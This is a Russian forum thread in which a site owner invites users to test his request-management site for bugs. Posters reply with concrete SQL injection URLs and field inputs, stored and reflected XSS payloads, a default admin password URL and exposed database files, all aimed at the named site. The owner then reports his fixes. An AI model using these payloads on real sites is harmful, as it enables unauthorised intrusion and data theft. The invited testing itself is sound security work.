Просмотр полной версии : Проверьте profopros.info
-=Zhenek=-
14.04.2009, 20:46
Собственно сайт для автоматизации работы мне.
Он автоматизирует управление заявками.
Поэтому просьба проверить на баги.
zhehek 12345
Заранее спасибо
пассивная xss
уязвимое поле :рассылка
пример:<script>alert(/xss/)</script>
Krist_ALL
14.04.2009, 22:45
SQL ENJECTON http://profopros.info/index.php?do=statya_more&id=3+union+select+1,version(),user(),4,5+--
BlackSun
14.04.2009, 22:45
SQL-INJ
http://profopros.info/index.php?do=news_more&id=-1+UNION+SELECT+1,2,3,version(),5,6+--+-
Активная XSS в гостевой
javascript:alert()
Пассивная XSS
http://profopros.info/subscribe/addemail.php?email=<script>alert()</script>
Дефолтный пароль на админку подписки на рассылку
http://profopros.info/subscribe/admin.php?pswrd=admin
SQL-INJ в регистрации
Регаемся с ником
логин','пароль',version(),'1231','111', '111','111','111')#
Ваш Логин: 222
Посл. ip :xxx
Счет : 1231 р. [+]
В профиле -
Почтовый ящик: 5.0.67-percona-highperf-b7-log
Примерно так же и в смене пароля в профиле.
-Hormold-
14.04.2009, 23:53
Активка(XSS) в подачи заявок...
В описание:
"><script>alert('XSS by Hormold. Cookie saved');</script><h1>xss</h1>
В поле email можно так:
<h1>xss</h1>
Удаче в бизе!
;)
----------------------------
BlackSun: активная она только для того, кто подавал заявку, насчет админа нет уверенности
UPD: проверил, у админа пашет.
mailbrush
14.04.2009, 23:55
Расскрытие путей почему-то выбило:
http://profopros.info/subscribe/admin.php
Parse error: syntax error, unexpected '<' in [path]/profopros.info/subscribe/config.php on line 3
CrazyStudentS_Mi}{
15.04.2009, 00:03
хе, знакомый двиг
когда то покупал первую версию
вот это удали http://profopros.info/db.sql
\\\\\\\\\ мля у ТСа и покупал))))))))
mailbrush
15.04.2009, 00:10
http://profopros.info/index.php?do=show_profile&login=admin
вот это крутой двиг. пассы нашару всем раздаем =)
Файл test.php раскрывает пути, но это я так понимаю временный файл.
readme.txt, db.sql - тоже какие-то сомнительные файлы с описанием
Админка для счетчика counter/admin.php и снова сомнительный файл с инфой
counter/info.txt
Раскрытие путей в /subscribe/addemail.php в переменной email
И если в хидере запроса задать в User-Agent: client-ip: например 123456789
Так же если в кукисах PHPSESSID оставить пустой.
Вообщем ничего такого сверх интересного, а остальное уже написали выше.
-=Zhenek=-
15.04.2009, 03:45
хе, знакомый двиг
когда то покупал первую версию
вот это удали http://profopros.info/db.sql
\\\\\\\\\ мля у ТСа и покупал))))))))
Да..Тока от старого двига остался только дизайн))) он переделан на 99%.
спс базу переименовал %)
http://profopros.info/index.php?do=show_profile&login=admin
вот это крутой двиг. пассы нашару всем раздаем =)
А это видимо последствия теста) Ща профиксим
Файл test.php раскрывает пути, но это я так понимаю временный файл.
readme.txt, db.sql - тоже какие-то сомнительные файлы с описанием
Админка для счетчика counter/admin.php и снова сомнительный файл с инфой
counter/info.txt
Раскрытие путей в /subscribe/addemail.php в переменной email
И если в хидере запроса задать в User-Agent: client-ip: например 123456789
Так же если в кукисах PHPSESSID оставить пустой.
Вообщем ничего такого сверх интересного, а остальное уже написали выше.
да тест временный.Остальные тоже. Все фикс.
Всем спасибо жду еще) в течении часа профиксю все баги.
-=Zhenek=-
15.04.2009, 05:11
Вроде все исправил.
Подписку удалил.Без надобности + пачка багов.
Скули подчистил.
Просьба проверить еще раз с регистрацией вроде профиксил может есть еще какие моменты.
Жду еще))
К сожелению могу прибавить только +2 к репе.
Но всем сказал спасибо)
BlackSun
15.04.2009, 05:30
XSS так и не закрыты
-=Zhenek=-
15.04.2009, 05:52
javascript:alert()
С этой придется покапаться она в библиотеке bbcode. Писал ее не я,исправлять буду долго.
Заметил только сейчас т.к работает Opera only Ие не проверял. в ФФ не работает.
[QUOTE]"><script>alert('XSS by Hormold. Cookie saved');</script><h1>xss</h1>
Эту исправил.Вроде. заявка не подается.
<h1>xss</h1>
фикс.
laedafess
15.04.2009, 06:34
при регистрации в логин можно <h1>gg</h1> засунуть. XSS кажется не выйдет, т.к. длинные логины обрезаются..
BlackSun
15.04.2009, 06:56
SQL-INJ в добавлении коментария
Текст: ',version(),'0','127.0.0.1') -- -
-=Zhenek=-
15.04.2009, 07:40
при регистрации в логин можно <h1>gg</h1> засунуть. XSS кажется не выйдет, т.к. длинные логины обрезаются..
Логин всегда обрабатывается htmlspecialchars. Получается логин и будет какой напишете)
SQL-INJ в добавлении коментария
Текст: ',version(),'0','127.0.0.1') -- -
FIX
-=Zhenek=-
16.04.2009, 08:08
Как вижу больше ничего не найдено всем спасибо!
Просьба тему закрыть.
GreenBear
16.04.2009, 08:30
женек ты хоть что нибудь фильтруешь до того, как тебе пальцем укажут? по моему такие сайты не проверять надо, а их разработчиков в тюрьму сажать
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot